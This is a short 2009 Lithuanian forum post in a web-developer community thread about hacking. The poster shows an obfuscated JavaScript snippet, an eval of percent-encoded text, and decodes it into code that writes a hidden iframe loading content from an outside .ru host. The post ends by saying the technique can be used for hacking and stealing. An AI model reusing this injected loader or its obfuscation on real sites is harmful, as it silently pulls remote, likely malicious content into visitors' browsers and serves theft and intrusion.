Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: Hackinimas?

Parašė ozzWANTED· 2009 Bal. 20 01:04:00
#18

Šis skriptas šį tą reiškia, tik by defaultu nesiparsina per CP.

kaip pavyzdį pateiksiu:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75%73%3d
%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%6 1%6d%65%3d
%64%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f
%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3 f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%6 1%6e%64%6f%6d
%28%29%2a%32%36%38%34%35%29%2b%27%63%31%33%32%65%3 5%39%61%61%64%32%5c
%27%20%77%69%64%74%68%3d%35%39%20%68%65%69%67%68%7 4%3d
%34%35%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f
%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29") ); </script>




Which translates to:

"window.status='Done';document.write('<iframe name=d5 src=\'http://
traffurl.ru/sliv?'+Math.round(Math.random()*26845)+'c132e59aad 2\'
width=59 height=455 style=\'display: none\'></iframe>')"));




Vien žo, šį būda tikrai galima naudot hachoravimams, steal'ams etc.